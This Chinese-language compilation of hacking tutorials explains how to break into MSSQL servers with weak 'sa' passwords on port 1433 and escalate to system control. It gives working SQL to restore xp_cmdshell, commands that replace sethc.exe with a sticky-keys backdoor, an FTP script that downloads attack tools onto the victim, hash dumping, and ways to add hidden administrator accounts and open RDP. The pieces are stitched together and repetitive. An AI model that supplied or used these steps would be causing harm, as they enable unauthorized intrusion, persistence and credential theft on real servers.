1433提权全教程

合集下载

利用SQL之1433端口巧妙入侵服务器

利用SQL之1433端口巧妙入侵服务器

利用SQL之1433端口巧妙入侵服务器利用1433端口提权相信大家扫到很多1433 都提示用net net1 提权都说拒绝访问!且又无法上传!今天给大家针对Net没权限情况的提权方法;1、未找到储存过程!那就来修复下吧!用到SQL语句:xp_cmdshell新的恢复办法第一步先删除:drop procedure sp_addextendedprocdrop procedure sp_oacreateexec sp_dropextendedproc 'xp_cmdshell'第二步恢复:dbcc addextendedproc ("sp_oacreate","odsole70.dll")dbcc addextendedproc ("xp_cmdshell","xplog70.dll")直接恢复,不管sp_addextendedproc是不是存在图12、修复好了!又出现问题了!xplog70.dll被删除了!看来只有用授鱼的那修复法!图23、d:\应用软件\SQLServer2000MicrosoftSQLServer2000SP4简体中文企业光盘版\SP4\x86\binn\xplog70.dLL找到了哈哈!图34、恢复!用到SQL语句:第一exec sp_dropextendedproc 'xp_cmdshell'第二dbcc addextendedproc ("xp_cmdshell","d:\应用软件\SQLServer2000MicrosoftSQLServer2000SP4简体中文企业光盘版\SP4\x86\binn\xplog70.dLL")恢复好了图45、提下权 net net1 都拒绝访问!管理降低了权限!图56、于是我想到了后门提权! 居然管理也注意到了后门!写了权限!用到CMD命令:五shift键(前提是能执行DOS命令,并且sethc.exe没加保护)一般只要执行第一步!copy C:\WINDOWS\explorer.exe c:\windows\system32\sethc.execopy C:\WINDOWS\explorer.exe c:\windows\system32\dllcache\sethc.exe图67、插入一点:如果DOS不能执行命令的话!那就用SQL执行替换命令!(成功率比较低!)用到SQL语句:利用SQL分析器开shift后门(一般只要执行第一步!然后进入后,替换自己的后门)第一:declare @o intexec sp_oacreate 'scripting.filesystemobject', @o outexec sp_oamethod @o,'copyfile',null,'C:\WINDOWS\explorer.exe' ,'c:\windows\system32\sethc.exe';第二:declare @oo intexec sp_oacreate 'scripting.filesystemobject', @oo outexec sp_oamethod @oo,'copyfile',null,'c:\windows\system32\sethc.exe' ,'c:\windows\system32\dllcache\sethc.exe'; 图78、这里是本节的重点了!利用传马的方式提权!首先自己架设一个FTP 或是自己已经有FTP的!把本机的net放到FTP空间里去!随便改个名字!切记不要和net相同即可!把FTP传马方式的语句一句一句复制执行DOS命令!用到CMD命令:echo open FTP> xiuxiu.txt 注意 xiuxiu.txt你可以随意改!但是要和下的相同! echo 帐号>> xxxx.txtecho 密码>> xxxx.txtecho binary >> xxxx.txtecho get net的名字.exe>> xxxx.txtecho bye >> xxxx.txtftp -s:xxxx.txtdel xxxx.txt. /q /f图89、好了!执行下最后一条命令! 嘿嘿!发现和FTP抓鸡方式一样!有鸡来下载!图910、好了!最后一条命令执行成功了!返回以下数据!注意:服务器必须能上网!图1011、我XXxX 我自己的 net好象没加权限吧! 居然不能执行返回了以下数据!发生系统错误5...这很多人都遇见过!其实可以省掉一部分! 以后提权传net的时候不要传net 直接net1 因为所以!我也解释不清楚!图1112、嘿嘿 net1后成功了! 提权成功!图1213、远程登录成功图13。

常见提权方法

常见提权方法

常见提权方法1. 用户提权:用户提权是指普通用户通过某种方式获取管理员权限或超级用户权限的行为。

常见的用户提权方法包括:利用弱密码、使用系统漏洞、利用特权提升程序等。

详细描述:用户提权是黑客经常使用的一种手段,通过获取管理员权限,黑客可以执行更高级别的操作,如修改系统配置、访问敏感文件等。

利用弱密码是最常见的用户提权方法之一。

黑客可以使用密码破解工具或暴力破解技术尝试猜解用户密码,一旦成功登录系统,就可以获取管理员权限。

系统漏洞也是用户提权的常见方法之一。

黑客可以通过渗透测试或漏洞扫描等方式发现系统中的漏洞,然后利用这些漏洞获取管理员权限。

某个系统可能存在一个未修补的漏洞,黑客可以利用这个漏洞上传特制的脚本,从而获得系统的控制权。

黑客还可以利用特权提升程序来提权。

这些程序的功能是在受限的用户权限下执行特权操作,如创建新用户、修改用户组等。

黑客可以通过执行这些特权提升程序来获取管理员权限,从而获得系统的完全控制权。

2. 命令注入:命令注入是指黑客通过在输入框或URL参数中注入恶意命令,从而执行非授权的操作。

常见的命令注入方法包括:通过修改URL参数、利用操作系统命令执行漏洞等。

详细描述:命令注入是一种常见的网络攻击手法,黑客通过在输入框或URL参数中注入恶意命令,从而执行非授权的操作。

黑客可以在一个搜索框中输入特定的字符串,以执行系统命令,或是通过改变URL参数来获取系统权限。

命令注入通常利用了操作系统的命令执行漏洞。

当用户传递的输入被直接用于构造系统命令时,如果没有正确进行输入验证和过滤,黑客就可以通过构造恶意输入来执行非授权的操作。

这种攻击方式在许多Web应用程序中非常常见,如论坛、博客等。

为了防止命令注入攻击,开发者应该始终对用户输入进行适当的验证和过滤。

可以使用特定的字符过滤器来禁止或转义危险的字符,或是通过使用参数化查询和预编译语句等方式防止SQL注入。

3. 文件包含漏洞:文件包含漏洞是指黑客通过利用应用程序中的文件包含功能来执行恶意代码。

1433口令提权详细过程及错误修复

1433口令提权详细过程及错误修复

前段时间我朋友给我一个sopo的软件,说是扫1433口令的,而且猜解速度很快,我就找个服务器试了试,确实不错能扫到一些比较强点的口令。

所以这段时间就玩了一下1433错误的恢复和提权。

(有人可能会说了,这有啥好研究的,sa的权限直接加用户到超管不就成了吗。

其实在sa权限下还是有很多的问题的大家可以捡有用的看没用的就略过吧)下面来说sa下执行命令错误的几种情况:1、无法装载DLL xpsql70.dll或该DLL所引用的某一DLL。

原因126(找不到指定模块。

)这种情况比较常见的,修复起来说简单也简单,但是有条件的。

这种情况要是能列出目录(用sqltools v2.0就有列目录功能)恭喜你这个有80%的情况能修复了,如果能列目录,那么只要找到xplog70.dll的路径执行以下命令就可以了。

第一步exec sp_dropextendedproc 'xp_cmdshell' (这个命令就是删除原有的cmdshell,因为已经出错了)第二步dbcc addextendedproc (“xp_cmdshell”,“c:\Program Files\Microsoft SQL Server\MSSQL\Binn\xplog70.dll”);EXEC sp_configure 'show advanced options', 0 –当然这是sql命令,用查询分析器执行。

第二步里的c:\Program Files\Microsoft SQL Server\MSSQL\Binn\xplog70.dll就是xplog70.dll的路径,这个路径是比较常见的,如果c盘没有可以找找其他盘符。

2、无法在库xpweb70.dll 中找到函数xp_cmdshell。

原因:127(找不到指定的程序。

)其实这个跟上面的126是一样的就是cmdshell出错了只要找到备份的xplog70.dll按照上面的方法就能修复了。

webshell msf 提权方法

webshell msf 提权方法

webshell msf 提权方法
Webshell是一种可以用来执行命令的脚本,通常用于攻击者在受害者的服务器上执行恶意操作。

MSF(Metasploit Framework)是一种流行的渗透测试工具,可以用于执行各种攻击和提权操作。

以下是使用MSF进行Webshell提权的一般步骤:
1. 获取Webshell:首先,攻击者需要将Webshell上传到受害者的服务器上。

这可以通过多种方式完成,例如通过文件上传漏洞、利用Web应用程序漏洞或其他漏洞。

2. 扫描目标:一旦Webshell上传成功,攻击者可以使用MSF的扫描器来扫描目标服务器的漏洞和弱点。

这可以帮助攻击者确定哪些用户和系统具有潜在的提权机会。

3. 执行攻击:一旦攻击者确定了潜在的提权机会,他们可以使用MSF的各种攻击模块来尝试提权。

这可能包括利用系统漏洞、使用缓冲区溢出攻击、执行命令注入等。

4. 获取权限:如果攻击成功,攻击者将获得对目标服务器的权限。

这可能包括管理员权限或其他高权限。

需要注意的是,这些步骤只是一个一般性的概述,并且实际情况可能因目标系统和环境而异。

此外,使用这些技术进行非法活动是非法的,并且可能导致严重的法律后果。

因此,建议仅在合法和授权的情况下使用这些技术。

渗透测试资料--提权技巧

渗透测试资料--提权技巧

### 提权技巧1.cmd拒绝访问就自己上传一个cmd.exe,自己上传的cmd是不限制后缀的,还可以是 cmd.txt cmd.rar等 user不能执行有时候是net.exe被删除了,可以先试试net1,不行就自己上传一个net.exe3.cmd执行exp没回显的解决方法:com路径那里输入exp路径C:\RECYCLER\pr.exe,命令那里清空(包括/c )输入net user jianmei daxia/add4.有时候因为监控而添加用户失败,试试上传抓取hash的工具,如PwDump7.exe,得到hash之后可以进行破解,建议重定向结果到保存为1.txtcmd /c c:\windows\temp\cookies\PwDump7.exe >1.txt,在条件允许的情况下也可以用mimikatz直接抓明文5.有时候权限很松,很多命令都可以执行,但是就是增加不上用户,这时候你就要考虑是不是因为密码过于简单或是过于复杂了6.用wt.asp扫出来的目录,其中红色的文件可以替换成exp,执行命令时cmd那里输入替换的文件路径,下面清空双引号加增加用户的命令7.有时候可以添加用户,但是添加不到管理组,有可能是administrators组改名了,使用命令net user administrator查看管理组的名字8.有的cmd执行很变态,asp马里,cmd路径填上面,下面填:"c:\xxx\exp.exe whoami” 记得前面加两个双引号,不行后面也两个,不行就把exp的路径放在cmd那里,下面不变9.当添加不上用户却可以添加“增加用户的Vbs、bat)的时候,就添加一个吧,然后用“直接使服务器蓝屏重启的东东”让服务器重启就提权成功10.菜刀执行的技巧,上传cmd到可执行目录,右击cmd 虚拟终端,help 然后setpc:\windows\temp\cmd.exe 设置终端路径为:c:\windows\temp\cmd.exe11.支持aspx但跨不了目录的时候,可以上传一个读iis的vbs,执行命令列出所有网站目录,找到主站的目录就可以跨过去了,上传cscript.exe到可执行目录,接着上传iispwd.vbs到网站根目录,cmd命令cmd /c“c:\windows\temp\cookies\cscript.exe” d:\web\iispwd.vbs11.如何辨别服务器是不是内网?192.168.x.x 172.16.x.x 10.x.x.x12.安全狗下加用户的语句::for /l %i in (1,1,1000) do @net user testtest [/add&@net]() localgroup administrators test /add13.21对应的FTP、1433对应的MSSQL、3306对应的MYSQL、3389对应的远程桌面、1521对应的Oracle、5631对应的pcanywhere14.劫持提权,说到这个,想必肯定会想到lpk.dll这类工具,有时候在蛋疼怎么都加不上账户的时候,可以试试劫持shift、添加开机启动等等思路15.提权成功但3389端口没开,执行语句或是工具开3389失败的时候,可以上传rootkit.asp,登陆进去就是system权限,这时候再尝试开3389希望较大### 常用DOS命令查看版本:ver查看权限:whoami查看配置:systeminfo查看用户:net user查看进程:tasklist查看正在运行的服务:tasklist /svc查看开放的所有端口:netstat -ano查询管理用户名:query user查看搭建环境:ftp 127.0.0.1查看指定服务的路径:sc qc Mysql添加一个用户:net user jianmei daxia.asd /add提升到管理权限:net localgroup administrators jianmei /add添加用户并提升权限:net user jianmei daxia.asd /add & net localgroup administrators jianmei /add查看制定用户信息:net user jianmei查看所有管理权限的用户:net localgroup administrators加入远程桌面用户组:net localgroup “Remote Desktop Users” jianmei /add 突破最大连接数:mstsc /admin /v:127.0.0.1删除用户:net user jianmei /del删除管理员账户:net user administrator daxia.asd更改系统登陆密码:net password daxia.asd激活GUEST用户:net user guest /active:yes开启TELNET服务:net start telnet关闭麦咖啡:net stop “McAfee McShield”关闭防火墙:net stop sharedaccess查看当前目录的所有文件:dir c:\windows\查看制定文件的内容:type c:\windows\1.asp把cmd.exe复制到c:\windows的temp目录下并命名为cmd.txt:copyc:\windows\temp\cookies\cmd.exe c:\windows\temp\cmd.txt开3389端口的命令:REG ADDHKLM\SYSTEM\CurrentControlSet\Control\Terminal” “Server /v fDenyTSConnections /t REG_DWORD /d 0 /f查看补丁:dir c:\windows\>a.txt&(for %i in (KB952004.log KB956572.log KB2393802.log KB2503665.log KB2592799.log KB2621440.logKB2160329.log KB970483.log KB2124261.log KB977165.log KB958644.log)do @type [a.txt|@find](mailto:a.txt%7C@find) /i [“%i”||@echo] (mailto:%E2%80%9C%i%E2%80%9D%7C%7C@echo)%i Not Installed!)&del /f /q /a a.txt### 常见杀软360tray.exe 360实时保护ZhuDongFangYu.exe 360主动防御KSafeTray.exe 金山卫士McAfee McShield.exe 麦咖啡SafeDogUpdateCenter.exe 服务器安全狗### windows提权中敏感目录和敏感注册表的利用敏感目录目录权限提权用途C:\Program Files\默认用户组users对该目录拥有查看权可以查看服务器安装的应用软件C:\Documents and Settings\All Users\「开始」菜单\程序 Everyone拥有查看权限存放快捷方式,可以下载文件,属性查看安装路径C:\Documents and Settings\All Users\Documents Everyone完全控制权限上传执行cmd及expC:\windows\system32\inetsrv\ Everyone完全控制权限上传执行cmd及expC:\windows\my.iniC:\Program Files\MySQL\MySQL Server 5.0\my.ini默认用户组users拥有查看权限安装mysql时会将root密码写入该文件C:\windows\system32\默认用户组users拥有查看权限 Shift后门一般在该文件夹,可以下载后门破解密码C:\Documents and Settings\All Users\「开始」菜单\程序\启动 Everyone拥有查看权限可以尝试向该目录写入vbs或bat,服务器重启后运行C:\RECYCLER\D:\RECYCLER\ Everyone完全控制权限回收站目录。

简述提权及其分类

简述提权及其分类

提权及其分类简介在计算机安全领域中,提权(Privilege Escalation)是指在一台计算机系统中,获取比当前用户权限更高的权限。

当攻击者成功提升自己的权限时,他们将获得更多的操作权限,从而能够更深入地渗透系统或者控制目标机器。

本文将深入探讨提权的背景、原理、分类以及常见的提权方法。

提权原理提权的原理是利用操作系统或软件的漏洞,绕过或者增加访问控制限制,从而获取更高的权限。

一般情况下,不同层次的用户拥有不同的权限,如普通用户只能进行普通操作,而超级用户(root)拥有最高权限,可以执行任意命令和访问任意资源。

提权分类根据攻击者获取提权所依赖的原始权限以及攻击手段的不同,提权可以分为以下几类。

垂直提权(Vertical Escalation)垂直提权指的是从低权限用户提升到高权限用户的过程。

攻击者通常利用系统软件或者配置错误的情况下,通过执行特定的命令或者利用漏洞获取高权限。

垂直提权可以分为以下几种类型:1.基于默认凭据的提权–利用默认的用户名和密码、加密密钥或者证书等凭据,提升权限。

–示例:攻击者通过使用常见的默认用户名和密码,“admin/admin”、“root/root”,成功登录系统并以高权限用户身份操作。

2.基于弱口令的提权–利用用户设置了弱口令或者使用了常见密码的情况下,通过暴力破解或者字典攻击获取高权限。

–示例:攻击者通过使用弱口令破解软件暴力破解用户密码,并成功获取高权限。

3.基于配置错误的提权–利用操作系统或者软件的配置错误,以及错误的访问控制策略,获取高权限。

–示例:攻击者通过访问控制列表(ACL)配置错误,绕过权限限制,获得高权限。

水平提权(Horizontal Escalation)水平提权指的是在同一权限层级中,攻击者从一个用户身份提升到另一个用户身份的过程。

攻击者通常利用系统或者应用程序中的漏洞,获取其他用户的权限。

水平提权可以分为以下几种类型:1.切换用户提权–利用操作系统或软件的漏洞,切换到拥有相同权限但不同身份的用户。

常见提权方法(一)

常见提权方法(一)

常见提权方法(一)常见提权方法1. 操作系统提权•提权漏洞利用:利用操作系统中已知的提权漏洞来获取系统权限,常见的漏洞包括文件权限配置错误、缓冲区溢出、逻辑漏洞等。

•拓展权限:利用操作系统提供的一些特殊权限或命令,如suid、sgid、sudo等,来获取临时的特权身份。

2. 应用程序提权•应用程序漏洞利用:利用应用程序中存在的漏洞,如SQL注入、远程代码执行、文件上传等,通过攻击者构造恶意数据或代码,来提升自己的权限。

•提权脚本/工具:使用已存在的提权脚本或工具,如Metasploit、MSFvenom等,来快速提升应用程序权限。

3. 身份伪装提权•社会工程学攻击:通过伪装成合法用户、管理员或其他高权限身份,诱导目标用户提供权限,如通过钓鱼邮件、伪装网站等手段。

•口令猜测/破解:对目标系统、应用程序的口令进行暴力猜测或使用破解工具,如字典攻击、暴力破解等。

•弱口令:对系统、应用程序等的默认账号密码或弱口令进行攻击,如admin/admin、123456等常见弱口令。

•配置错误利用:利用系统或应用程序配置错误,如未及时更新软件、未关闭不必要的服务等,从而获得系统权限。

5. 特殊设备提权•物理入侵:通过实际接触目标设备,如服务器、路由器等,进行操作,获取管理权限。

•设备漏洞利用:利用特殊设备(如网络摄像头、智能家居等)存在的漏洞,进行远程攻击,获取设备权限。

以上是常见的提权方法,在进行安全防护时,需要注意及时更新系统和应用程序、配置合理的权限控制、使用强密码、定期进行安全审计等,以有效防范提权攻击的发生。

6. 物理设备提权•USB攻击:通过携带恶意的USB设备,如USB键盘模拟器、USB 存储设备等,来获取目标设备的权限。

•直接访问:通过直接访问目标设备的控制台或终端,如服务器、交换机等,进行非法操作,获取设备权限。

•中间人攻击:通过在网络通信过程中劫持、篡改或窃取数据,获取目标系统或应用程序的权限。

常见的提权方法

常见的提权方法

常见的提权方法1. 提权方法之一是利用弱密码。

当系统或应用程序使用弱密码进行身份验证时,攻击者可以使用字典攻击、暴力破解或社交工程等技术来猜解密码并获取管理员权限。

2. 通过漏洞利用来提权也是一种常见的方法。

攻击者可以利用系统、应用程序或服务的安全漏洞,通过代码注入、缓冲区溢出等技术来获取提权权限。

3. 通过系统配置错误来提权。

攻击者可以利用系统管理员在配置文件、访问控制列表或权限设置等方面的错误来获得更高的权限。

4. 利用恶意软件进行提权也是一种常见的方法。

攻击者可以通过植入恶意软件、后门程序或恶意脚本等方式,在受害者计算机上运行,并以管理员权限执行特定操作。

5. 通过内核提权也是一种常见的方法。

攻击者可以利用操作系统内核的漏洞,通过缓冲区溢出、内存损坏或环境变量篡改等技术来获取提权权限。

6. 利用特权升级工具进行提权是另一种常见的方法。

这些工具包括Metasploit、Backtrack、Kali Linux等,它们提供了各种漏洞利用和提权的功能。

7. 利用附加权限漏洞进行提权。

当系统或应用程序授予某些用户或组额外的特权时,攻击者可以利用这些漏洞来获取提权权限。

8. 通过利用网络服务进行提权。

一些网络服务存在软件或配置漏洞,攻击者可以通过这些漏洞利用来获取提权权限。

9. 利用操作系统的弱点进行提权。

操作系统中可能存在一些安全性较弱的功能或配置,攻击者可以利用这些弱点来获取管理员权限。

10. 攻击者还可以通过社交工程和伪造身份来获取提权权限。

他们可能通过欺骗或说服其他用户来获得管理员权限,或者利用钓鱼等技术获取管理员凭据。

21种RING的提权方法

21种RING的提权方法

21种RING的提权方法21种RING的提权方法以下全部是本人提权时候的总结很多方法至今没有机会试验也没有成功,但是我是的确看见别人成功过的。

本人不才,除了第一种方法自己研究的,其他的都是别人的经验总结。

希望对朋友有帮助!1.radmin连接法条件是你权限够大,对方连防火墙也没有。

封装个radmin上去,运行,开对方端口,然后radmin上去。

本人从来米成功过。

,端口到是给对方打开了。

2.paanywhereC:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\ 这里下他的GIF文件,在本地安装pcanywhere上去3.SAM破解C:\WINNT\system32\config\ 下他的SAM 破解之4.SU密码夺取C:\Documents and Settings\All Users\「开始」菜单\程序\ 引用:Serv-U,然后本地查看属性,知道路径后,看能否跳转进去后,如果有权限修改ServUDaemon.ini,加个用户上去,密码为空[USER=WekweN|1]Password=HomeDir=c:\TimeOut=600Maintenance=SystemAccess1=C:\|RWAMELCDPAccess1=d:\|RWAMELCDPAccess1=f:\|RWAMELCDPSKEYValues=这个用户具有最高权限,然后我们就可以ftp上去quote site exec xxx 来提升权限5.c:\winnt\system32\inetsrv\data\引用:就是这个目录,同样是erveryone 完全控制,我们所要做的就是把提升权限的工具上传上去,然后执行6.SU溢出提权这个网上教程N多不详细讲解了7.运行Csript引用:运行"cscript C:\Inetpub\AdminScripts\adsutil.vbs get w3svc/inprocessisapiapps"来提升权限用这个cscript C:\Inetpub\AdminScripts\adsutil.vbs get w3svc/inprocessisapiapps查看有特权的dll文件:idq.dll httpext.dll httpodbc.dll ssinc.dll msw3prt.dll再将asp.dll加入特权一族asp.dll是放在c:\winnt\system32\inetsrv\asp.dll (不同的机子放的位置不一定一样)我们现在加进去cscript adsutil.vbs set /W3SVC/InProcessIsapiApps "C:\WINNT\system32\idq.dll" "C:\WINNT\system32\inetsrv\httpext.dll""C:\WINNT\system32\inetsrv\httpodbc.dll""C:\WINNT\system32\inetsrv\ssinc.dll""C:\WINNT\system32\msw3prt.dll""c:\winnt\system32\inetsrv\a sp.dll"可以用cscript adsutil.vbs get /W3SVC/InProcessIsapiApps 来查看是不是加进去了8.脚本提权c:\Documents and Settings\All Users\「开始」菜单\程序\启动"写入bat,vbs9.VNC这个是小花的文章 HOHO默认情况下VNC密码存放在HKCU\Software\ORL\WinVNC3\Password我们可以用vncx4破解它,vncx4使用很简单,只要在命令行下输入c:\>vncx4 -W然后顺序输入上面的每一个十六进制数据,没输完一个回车一次就行了。

系统安装SQLSever2000后1433端口未开放,如何打开1433端口的解决方法

系统安装SQLSever2000后1433端口未开放,如何打开1433端口的解决方法

系统安装SQLSever2000后1433端⼝未开放,如何打开1433端⼝的解决⽅法这篇⽂章主要针对Win2003系统安装SQL Sever2000后1433端⼝未开放,如何打开1433端⼝的解决⽅法。

⽤了⼏年的Windows2003和SQL Server2000了,不过这个问题倒是头次遇到。

最近调试⼀个JSP+SQL2000WEB程序遇到个现象,在Win2003简体中⽂服务器版上安装SQL Server2000,默认安装,⼀切正常,但是在安装完成后Tomcat运⾏正常,JSP程序却⽆法连接SQL2000数据库,查看端⼝,1433端⼝居然未开放,当然更不⽤说远程连接了。

⼀般分析的都是这样:1、sql server服务没有启动;检查服务启动,重新启动服务故障依然。

2、修改了端⼝号;打开⽹络实⽤⼯具,检查启⽤的协议中有TCP/IP协议,查看端⼝,是1433没错。

3、客户端实⽤⼯具作了改动;打开客户端实⽤⼯具,检查协议端⼝正常,重新创建⼀个别名,依然不⾏。

4、安装的问题;怀疑安装步骤有问题。

遂卸载重装,⼀切默认,故障依然。

5、安装版本的问题;查看安装光盘,是久经考验的安装盘,应该不会出问题。

6、系统的问题;也看不出有什么其它的问题,难道是系统的问题?不过重装系统可太过⿇烦,还是先想想其它的办法,看能不能找到问题所在。

检查系统⽇志,这个应该是⼀个⽐较好的习惯。

仔细翻了⼀遍重新安装后的⽇志,赫然发现如下内容:您运⾏的 Microsoft SQL Server 2000 版本或 Microsoft SQL Server 2000 Desktop Engine (也称为 MSDE) 和Microsoft Windows Server 2003 家族使⽤时存在已知的安全弱点。

为了减少计算机被某些病毒的攻击,Microsoft SQL Server 2000,MSDE 或两者的 TCP/IP 和 UDP ⽹络端⼝被禁⽤。

capabilities提权的方法

capabilities提权的方法

一、提权概述在计算机领域中,提权是指将一个用户的权限提高到比原来更高的级别。

通常情况下,权限越高,可以执行的操作也就越多。

提权可以让用户执行一些普通权限无法完成的任务,比如访问受限资源、修改系统文件等。

在实际应用中,提权被广泛应用于网络安全、系统管理等领域。

提权的方法种类繁多,包括但不限于漏洞利用、提权工具、权限提升等。

二、漏洞利用漏洞利用是一种常见的提权方法。

当系统或应用程序存在未修补的安全漏洞时,黑客可以利用这些漏洞来获取更高的权限。

常见的漏洞包括操作系统漏洞、应用程序漏洞、网络漏洞等。

黑客可以利用这些漏洞来执行恶意代码,获取系统权限或者访问敏感数据。

及时修补漏洞,加强系统安全是至关重要的。

三、提权工具提权工具是一种专门用于提高用户权限的软件。

这些软件通常通过利用系统或应用程序的漏洞来获取更高的权限。

常见的提权工具包括Metasploit、PowerSploit、Mimikatz等。

这些工具可以帮助黑客快速获取管理员权限,执行恶意操作。

在使用这些工具时,需要格外小心,确保系统安全。

四、权限提升除了利用漏洞和工具来提升权限外,还有一些常见的方法可以实现权限提升。

比如在Windows系统中,可以通过修改系统注册表,利用系统服务漏洞,修改系统凭据等方式来提升权限。

在Linux系统中,也可以通过提升SUID权限,利用setuid程序漏洞等方式来获取更高的权限。

五、防范措施为了有效防范提权攻击,我们可以采取一些措施来加固系统安全。

及时修补系统和应用程序的安全漏洞,确保系统处于最新的安全状态。

加强系统日志监控,及时发现异常操作。

另外,限制用户权限,确保每个用户只能访问自己需要的资源,避免权限滥用。

定期对系统进行安全检查,使用安全审计工具定期扫描系统漏洞,及时发现可能存在的安全隐患。

六、总结提权是一种常见的攻击方式,可以让黑客获取更高的权限,执行恶意操作。

为了防范提权攻击,我们需要加强系统安全管理,及时修补漏洞,加强日志监控,限制用户权限等措施。

开放1433端口进行telnet连接

开放1433端口进行telnet连接

笔者,最近制作了‎一款win‎f orm系‎统软件,数据库是s‎q l serve‎r 2005,部署在服务‎器上,而系统软件‎安装在从机‎上。

安装好后发‎现数据库没‎有连接上,于是与服务‎器端进行连‎接测试,现把调试过‎程描述如下‎。

(以本机为例‎)1. 首先要测试‎本机的物理‎连接与服务‎器端的物理‎连接是否畅‎通。

a. 方法:开始-→运行→cmd ping 127.0.0.1有返回值表‎示已经调通‎。

2. 测试telne‎t远程连接服‎务是否畅通‎,a. 方法telne‎t127.0.0.1 1433 其中143‎3为数据库‎服务端口,如果为出行‎如下黑屏则‎说明有一些‎原因导致。

连接不上的‎提示是:原因分析:1. 先看看wi‎n dows‎自带的防火‎墙是否关闭‎方法:开始-→设置->控制面板→windo‎w s防火墙‎建议关闭防‎火墙。

2. 如果是sq‎l serve‎r2005的‎数据库,需要看下是‎否安装了s‎q l serve‎r2005‎e xpre‎s s组件(笔者就是没‎有安装这个‎组件的原因‎所导致)。

a.检查下配置‎:服务和连接‎的外围应用‎配置器同时使用T‎C P/IP和na‎med pipes‎。

b.sql serve‎r配置管理器‎1). Sql serve‎r 2005服‎务启动sql‎ serve‎r (sqlex‎p ress‎服务)2).sqlex‎p ress‎的协议中启‎动TCP/IP协议,TCP/IP属性 IPALL‎TCP端口‎改为143‎3右击“SQL Serve‎r (SQLEX‎P RESS‎)”,选择重新启‎动。

再回到命令‎行下,键入:telne‎t local‎h ost 1433 进入黑屏。

网络安全视频列表

网络安全视频列表

功能更强!瞬间成为令人羡慕的xx高手!
走过路过,千万不要错过!
一次性购买,终身免费升级!全套高清视频教程+超级黑客vip终极工具包 独家销售,莫失
建议大家安装虚拟机测试软件,不要用于非法用途,我们对于软件引起的任何后果,不承担任何责任!
现在很多朋友对黑客的概念越来越模糊,会盗Q的自称是黑客,挂几个肉鸡攻击他人站点的也说自己是黑客,
从零开始跟我学linux安全11-20
黑客防线防黑特训班
Linux-特训班-黑客基地
LinuxVIP班-34讲-黑客基地上部
LinuxVIP班-34讲-黑客基地下部
Linux特训班-23讲-黑防
网络应用深入实践随书光盘视频教程
服务器安全与管理特训班-44讲-黑防
Metasploit_Framework系列视频
你成为黑客高手已经不再遥远!
再问一句你想成为黑客吗?
答案是必须的
好了 接着看下面的内容把!
2011年 各界不断打击黑客 导致很多黑客论坛都被关闭了
的确2011黑客的门槛增高了不少!
诚意购买联系暗月式 QQ:40497992
饭客网络黑客基础入门系列培训教程1-19
饭客网络黑客基础入门系列培训教程21-40
华夏黑客(77169)VIP培训教程合辑上部
华夏黑客(77169)VIP培训教程合辑下部
华中红客基地QQ攻防系列教程1-25
华中红客基地QQ攻防系列教程26-50
红黑联盟提权教程
华中红客基地1433提权系列教程
网络绝版黑鹰大米ASP注射入门
黑客防线溢出漏洞发掘培训
黑吧ms班1-10
黑吧ms班11-20

1433全手工制作过程

1433全手工制作过程

14.select * from openrowset('microsoft.jet.oledb.4.0',';database=ias\ias.mdb','select shell("mcsql.exe")')
15.go
16.declare @hr int
17.declare @object int;declare @property int
03.EXEC sp_OASetProperty @ObjectToken, 'Type', 1
04.EXEC sp_OAMethod @ObjectToken, 'Open'
05.EXEC sp_OAMethod @ObjectToken, 'Write', NULL,
06.0x############################################################
“do start /b sql\osql.exe -S %%i -U %%j -P %%k <sql\mssql.sql ”
start /b的意思就是不建立新窗口,执行命令,就是i -U %%j -P %%k <sql\mssql.sql”
20.go
21.select * from openrowset('microsoft.jet.oledb.4.0',';database=SysS.xml','select shell("mcsql.exe")')
22.go
setlocal enabledelayedexpansion

华中红客VIP教程

华中红客VIP教程

2010完完全全学抓鸡系列教程(五)批量2967端口抓鸡
/2010/donghua/3222967zj.rar
打造个人版灰鸽子视频动画区
打造个人版灰鸽子第一课:思路详解及修改标题
/2010/donghua/gz/dzgrgz1.rar
/2010/donghua/e/eyy25.rar
易语言第二十六课:打造简单恶搞程序
/2010/donghua/e/eyy26.rar
易语言第二十七课:给程序加注册码(上)
/2010/donghua/e/eyy27.rar
易语言第十四课:模块与命令的运用
/2010/donghua/e/eyy14.rar
易语言第十五课:打造简单MP3播放器
/2010/donghua/e/eyy15.rar
易语言第十六课:打造传奇归来盗号外挂
网页制作第九课、VBScript脚本语言(一)
/2010/donghua/wyzz/wyzz9.rar
网页制作第十课、VBScript脚本语言(二)
/2010/donghua/wyzz/wyzz10.rar
2010完完全全学抓鸡系列教程(三)批量抓鸡445端口
/2010/donghua/zj/2010zjsan.rar
2010完完全全学抓鸡系列教程(四)批量抓鸡135端口
/2010/donghua/zj/2010zjsi.rar
网页制作第十一课、VBScript脚本语言(三)
/2010/donghua/wyzz/wyzz11.rar
网页制作第十二课、VBScript脚本语言(四)
/2010/donghua/wyzz/wyzz12.rar

1433提权详解

1433提权详解

1433提权详解!!!随着网络安全意识的提高,很多服务器的安全防范都非常严了,本人对web入侵是一巧不通就只会扫扫1433弱口令的服务器,于是研究一段时间,虽然进步不大,但是还是想把经验分享一下,正所谓授人以鱼不如授人以渔,而我现在正是告诉你打鱼的方法,下面就以一台服务器为例了,本例使用工具为SQL TOOLS 2.0,论坛有下,请自行搜索。

插播不是广告的广告:该工具集成度高,简单的sql指令无须使用分离器,直接在此工具中执行即可,其文件管理功能非常强大,反正我用着太顺手了,推荐一下,本文原创发布于=华夏黑客同盟论坛=()广告完毕。

把扫到的ip和sa及口令填入连接后,用dos命令功能试试列目录显示错误信息:Error Message:无法装载 DLL xplog70.dll 或该 DLL 所引用的某一 DLL。

原因: 126(找不到指定的模块。

)。

